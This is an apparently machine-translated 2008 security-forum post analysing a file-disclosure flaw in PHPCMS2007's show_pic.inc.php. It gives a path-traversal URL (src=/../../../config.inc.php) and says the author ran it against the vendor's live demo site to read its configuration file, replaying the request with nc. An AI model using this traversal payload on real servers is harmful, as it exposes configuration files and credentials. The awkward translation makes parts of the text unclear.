A simple php source code disclosure vulnerability excavations-vulnerability warning-the black bar safety net

ID MYHACK58:62200821481
Type myhack58
Reporter 佚名
Modified 2008-12-14T00:00:00


We know that in asp appears to be the most or thesql injection, but in php since magic_quotes_gpc is on case special characters will be escaped, so even if there are a lot of times theresql injectionalso I can not use. But php powerful file operation function, but so that we can experience in asp can not appreciate the fun, I think php comes with a file operation function will allow you to beat faster~~Hey Hey

This time I discover that phpcms2007 source code disclosure vulnerability

Again to Phpcms2007 of open-source behavior of a tribute to it!!!!

Start right,

findstr /s /n /i readfile *. php >readfile.txt (I only give out useful)

Other file manipulation functions can define your own lookup

module\picture\show_pic. inc. php:8:readfile($file);

Follow up this file to see it, ha ha, is relatively small, I like

[Copy to clipboard] [ - ]CODE: <? php defined('IN_PHPCMS') or exit('Access Denied'); require PHPCMS_ROOT.'/ module/'.$ mod.'/ include/common.inc.php'; isset($src) or exit; $file = PHPCMS_ROOT.'/'.$ PHPCMS['uploaddir'].'/'.$ CHA['channeldir'].'/'.$ MOD['upload_dir'].'/'.$ src; if(empty($PHP_REFERER) || ! strpos($PHP_REFERER, $PHP_DOMAIN)) $file = PHPCMS_ROOT.'/ images/error.jpg'; header("Content-type:image/pjpeg"); readfile($file); ?& gt; All the way to the analysis.

The first contains the file/module/'.$ mod.'/ include/common.inc.php

If there is a variable$src then give it the path and the value to the variable$file

Then it enters the if

Here I do not see other files is simple guess the next should be to determine the url path of the source, i.e. the anti-theft chain function

And then header()to a picture header

Oh, gently pine pine on the readfile($file);

As can be seen it is not determined that the$src file type, if we submit a src=*. php is also readfile

Well, here vulnerability is the emergence of the

However, due to the“defined('IN_PHPCMS') or exit('Access Denied');”, so we cannot directly exploit this vulnerability files.

Only in the the other contains this file in the php file use


[Copy to clipboard] [ - ]CODE: findstr /s /i /n show_pic.inc.php *. php >show_pic.inc.php.txt

picture\show_pic. php:4:require PHPCMS_ROOT."/ module/".$ mod."/ show_pic.inc.php"; Take a look inside

[Copy to clipboard] [ - ]CODE: <? php require "./ config.inc.php"; require "../include/common.inc.php"; require PHPCMS_ROOT."/ module/".$ mod."/ show_pic.inc.php"; ?& gt; Oh, if register_globals is on, then you can directly use this file to read the target file.

That's the test.

The official demo Station is

[Copy to clipboard] [ - ]CODE: ! http://demo.phpcms.cn/ That it is so to construct the url

[Copy to clipboard] [ - ]CODE: /picture/show_pic.php?src=/../../../config.inc.php Hey Hey, read that Web site's configuration file

Direct access

[Copy to clipboard] [ - ]CODE: ! http://demo.phpcms.cn//picture/show_pic.php?src=/../../../config.inc.php Oh, guess that's right now!!

That we can first visit! http://demo.phpcms.cn/ 抓包

With nc Contracting

the get option is set to

[Copy to clipboard] [ - ]CODE: /picture/show_pic.php?src=/../../../config.inc.php Here I went with a hedgehog of a post submission tool instead.

The test results shown in Figure

ok, on the analysis here.

Hope you do not use this to do something illegal, Hey Hey all!!!